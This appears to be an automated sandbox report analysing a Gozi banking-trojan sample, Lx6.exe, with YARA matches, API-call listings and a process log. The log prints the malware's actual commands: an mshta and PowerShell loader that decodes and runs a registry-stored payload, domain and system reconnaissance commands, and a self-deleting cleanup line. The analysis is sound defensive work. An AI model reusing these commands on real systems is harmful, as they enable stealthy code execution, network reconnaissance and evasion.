Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_004015CB GetProcAddress,NtCreateSection,memset,	0_2_004015CB
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0040182B NtMapViewOfSection,	0_2_0040182B
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00401673 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,	0_2_00401673
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_007541C8 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	0_2_007541C8
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0076D196 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	0_2_0076D196
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075AA0B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	0_2_0075AA0B
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075B433 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	0_2_0075B433
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00751402 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	0_2_00751402
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00768E68 NtQueryInformationProcess,	0_2_00768E68
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0076E897 NtQuerySystemInformation,RtlNtStatusToDosError,	0_2_0076E897
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00754153 NtGetContextThread,RtlNtStatusToDosError,	0_2_00754153
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0076411F OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,CloseHandle,	0_2_0076411F
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0077027B NtQueryInformationProcess,	0_2_0077027B
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00754A69 memset,NtQueryInformationProcess,	0_2_00754A69
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075624E NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	0_2_0075624E
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0076BB1B OpenProcess,NtQueryInformationProcess,	0_2_0076BB1B
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_007523FC memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	0_2_007523FC
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00752BC2 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	0_2_00752BC2
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_007684EA NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_007684EA
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075BDCE OpenProcess,OpenProcess,TerminateProcess,NtSuspendProcess,OpenProcess,CloseHandle,NtResumeProcess,CloseHandle,	0_2_0075BDCE
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_00753F26 NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_00753F26
Source: C:\Users\user\Desktop\Lx6.exe	Code function: 0_2_0075BF83 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	0_2_0075BF83
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302AA0B NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,	35_2_0302AA0B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0303D196 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	35_2_0303D196
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03038E68 NtQueryInformationProcess,	35_2_03038E68
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0303BB1B NtQueryInformationProcess,	35_2_0303BB1B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03022BC2 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	35_2_03022BC2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_03024A69 memset,NtQueryInformationProcess,	35_2_03024A69
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0304027B NtQueryInformationProcess,	35_2_0304027B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0303411F OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,CloseHandle,	35_2_0303411F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0303E897 NtQuerySystemInformation,RtlNtStatusToDosError,	35_2_0303E897
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 35_2_0302BDCE TerminateProcess,NtSuspendProcess,CloseHandle,NtResumeProcess,CloseHandle,	35_2_0302BDCE
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E73BC NtQueryInformationProcess,RtlDeleteBoundaryDescriptor,	41_2_000001CEDB3E73BC
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB40B934 NtWriteVirtualMemory,	41_2_000001CEDB40B934
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E2950 NtQueryInformationToken,NtQueryInformationToken,	41_2_000001CEDB3E2950
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB4088C8 NtSetContextThread,NtUnmapViewOfSection,	41_2_000001CEDB4088C8
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3E5F64 NtQueryInformationProcess,	41_2_000001CEDB3E5F64
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB4057D8 NtCreateSection,	41_2_000001CEDB4057D8
Source: C:\Windows\System32\cmd.exe	Code function: 41_2_000001CEDB3F94A8 NtMapViewOfSection,	41_2_000001CEDB3F94A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA9A10 NtReadVirtualMemory,	62_2_0000019933FA9A10
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F92950 NtQueryInformationToken,NtQueryInformationToken,NtClose,	62_2_0000019933F92950
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FBB934 NtWriteVirtualMemory,	62_2_0000019933FBB934
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB88C8 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,	62_2_0000019933FB88C8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FB57D8 NtCreateSection,	62_2_0000019933FB57D8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F95F64 NtQueryInformationProcess,	62_2_0000019933F95F64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F9F4FC NtAllocateVirtualMemory,	62_2_0000019933F9F4FC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FA94A8 NtMapViewOfSection,	62_2_0000019933FA94A8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933F973BC RtlAllocateHeap,NtQueryInformationProcess,RtlDeleteBoundaryDescriptor,	62_2_0000019933F973BC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Code function: 62_2_0000019933FCD002 NtProtectVirtualMemory,NtProtectVirtualMemory,	62_2_0000019933FCD002
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F5F64 NtQueryInformationProcess,	67_2_000001FA9D6F5F64
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D6F2950 NtQueryInformationToken,NtQueryInformationToken,NtClose,	67_2_000001FA9D6F2950
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Code function: 67_2_000001FA9D72D002 NtProtectVirtualMemory,NtProtectVirtualMemory,	67_2_000001FA9D72D002

Source: Lx6.exe, 00000000.00000003.448794487.0000000004094000.00000004.00001000.00020000.00000000.sdmp

Binary or memory string: OriginalFilenamentdll.dllj% vs Lx6.exe

Source: Lx6.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: 9AF9.bin1.20.dr

Binary string: Boot Device: \Device\HarddiskVolume2

Source: classification engine

Classification label: mal100.spre.bank.troj.spyw.expl.evad.winEXE@132/40@6/4

Source: C:\Windows\System32\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: Lx6.exe	ReversingLabs: Detection: 66%
Source: Lx6.exe	Virustotal: Detection: 63%

Source: C:\Users\user\Desktop\Lx6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Lx6.exe C:\Users\user\Desktop\Lx6.exe
Source: unknown	Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Ccqf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Ccqf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"
Source: C:\Users\user\Desktop\Lx6.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic computersystem get domain \|more > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\more.com more
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\user\WhiteBook.lnk -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep unrestricted -file C:\Users\user\TestLocal.ps1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup 127.0.0.1 >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nslookup.exe nslookup 127.0.0.1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "tasklist.exe /SVC >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist.exe /SVC
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "driverquery.exe >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\driverquery.exe driverquery.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\msihj3zd.cmdline
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESFA7A.tmp" "c:\Users\user\AppData\Local\Temp\CSCABF4CE5BBE3740BAB8B4C0CFADC5BA2E.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net config workstation >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all /domain >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vupj0yhs.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES501C.tmp" "c:\Users\user\AppData\Local\Temp\CSCB1F306A019E148659D5DB92DA08A3D35.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "net view /all >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"
Source: C:\Users\user\Desktop\Lx6.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name wslluui -value gp; new-alias -name gwhuthvwu -value iex; gwhuthvwu ([System.Text.Encoding]::ASCII.GetString((wslluui "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iyr5jfx4.cmdline	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jxpjpfgv.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA4F5.tmp" "c:\Users\user\AppData\Local\Temp\CSCAB583CA567BD44E39E9932B1B4F9F8AB.TMP"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB08E.tmp" "c:\Users\user\AppData\Local\Temp\CSCF2AAFAB6410F41F998231914A7D0E24.TMP"	Jump to behavior
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\Lx6.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "wmic computersystem get domain \|more > C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\9AF9.bin1"	Jump to behavior
